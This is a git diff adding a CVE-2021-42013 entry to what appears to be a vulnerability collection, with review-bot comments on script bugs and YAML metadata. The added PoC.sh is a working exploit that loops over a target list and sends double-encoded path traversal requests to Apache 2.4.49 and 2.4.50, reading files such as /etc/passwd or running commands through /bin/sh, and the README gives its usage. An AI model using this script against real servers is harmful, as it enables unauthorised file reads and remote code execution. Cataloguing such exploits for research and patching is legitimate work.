diff --git a/cve/apache/2021/CVE-2021-42013/PoC.sh b/cve/apache/2021/CVE-2021-42013/PoC.sh
new file mode 100644
index 0000000000000000000000000000000000000000..cf5cfe12d54aa68d717df1c174322b03ffd8e2fc
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-42013/PoC.sh
@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Exploit: Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
+# Date: 10/05/2021
+# Exploit Author: Lucas Souza https://lsass.io
+# Vendor Homepage: https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773, CVE-2021-42013
+# Credits: Ash Daulton and the cPanel Security Team
+
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
+echo ./PoC.sh targets.txt /etc/passwd
+echo ./PoC.sh targets.txt /bin/sh id
+
+exit
+fi
+for host in $(cat $1); do
+echo $host
+curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done
diff --git a/cve/apache/2021/CVE-2021-42013/README.md b/cve/apache/2021/CVE-2021-42013/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..6aa6f65a68a4b3e744503eeb9b560b51bce35581
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-42013/README.md
@@ -0,0 +1,18 @@
+
+
+## Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
+##### Exploit Author: Lucas Souza https://lsass.io
+##### Vendor Homepage: https://apache.org/
+##### Version: 2.4.49, 2.4.50
+##### Tested on: 2.4.49, 2.4.50
+##### CVE : CVE-2021-41773, CVE-2021-42013
+##### Credits: Ash Daulton and the cPanel Security Team
+
+
+
+
+#### Usage
+
+ ./PoC.sh targets.txt /etc/passwd
+
+ ./PoC.sh targets.txt /bin/sh "id"
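Review bot: In PoC.sh the argument guard `if [[ $1 == '' ]]; [[ $2 == '' ]]; then` joins its two tests with `;`, so only the second test decides the branch and the first has no effect. The intended check is `if [[ -z "$1" || -z "$2" ]]; then`. The usage path ends in a bare `exit`, which returns the status of the preceding `echo` (success), so a caller or CI job cannot tell a usage error from a completed run; `exit 1` would fix that. The header comment says `# Version: 2.4.49` and `# Tested on: 2.4.49`, while the README added in the same commit lists 2.4.49 and 2.4.50 for both fields, so one of the two is out of date. The usage text also misspells the first argument as `TAGET-LIST.TXT`.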
diff --git a/cve/apache/2021/CVE-2021-42013/apache.png b/cve/apache/2021/CVE-2021-42013/apache.png
new file mode 100644
index 0000000000000000000000000000000000000000..d4b2ad27bdf0174310f99ffd299deb459acc17d6
Binary files /dev/null and b/cve/apache/2021/CVE-2021-42013/apache.png differ
diff --git a/cve/apache/2021/yaml/KVE-2022-0206.yaml b/cve/apache/2021/yaml/CVE-2021-41773.yaml
similarity index 100%
rename from cve/apache/2021/yaml/KVE-2022-0206.yaml
rename to cve/apache/2021/yaml/CVE-2021-41773.yaml
diff --git a/cve/apache/2021/yaml/CVE-2021-42013.yaml b/cve/apache/2021/yaml/CVE-2021-42013.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..25ad632212517b6cbcc0d219896e7dbee9fa5ad3
--- /dev/null
+++ b/cve/apache/2021/yaml/CVE-2021-42013.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-42013
+source: https://github.com/Ls4ss/CVE-2021-41773_CVE-2021-42013
+info:
+ name: Apache HTTP Server(简称 Apache)是开源的 Web 服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的 Web 服务器端软件之一。它快速、可靠并且可通过简单的 API 扩展,将 Perl/Python 等解释器编译到服务器中。
+ severity: critical
+ description: |
+ Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。
+ scope-of-influence:
+ Apache HTTP = 2.4.49, Apache HTTP = 2.4.50
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-42013
+ - https://httpd.apache.org/security/vulnerabilities_24.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-42013
+ cwe-id: CWE-22
+ cnvd-id: None
+ kve-id: None
+ tags: cve2021,Apache,目录遍历,RCE
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index fda618d64e897264be9f2a4adb7a959084404865..276c1b8677532aa5c0e04a044b8026ab222caea0 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -3,6 +3,7 @@ cve:
 apache:
 - CVE-2020-9490
 - CVE-2021-41773
+ - CVE-2021-42013
 linux-kernel:
 - CVE-2021-22555
 - CVE-2022-34918
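Review bot: In cve/apache/2021/yaml/CVE-2021-42013.yaml the `info.name` field holds a general description of the Apache HTTP Server product rather than a name for this vulnerability. Any listing keyed on `name` would therefore presumably not identify the entry as CVE-2021-42013. A name along the lines of `name: Apache HTTP Server 2.4.49/2.4.50 path traversal and RCE (incomplete fix for CVE-2021-41773)` would match what `description` already states. The entry also gives no remediation: `scope-of-influence` lists the affected versions, but nothing points the reader to the fixed release in the httpd advisory already listed under `reference`. If the schema has a field for it, that is worth adding; the schema is not visible in this diff. The file also ends without a trailing newline.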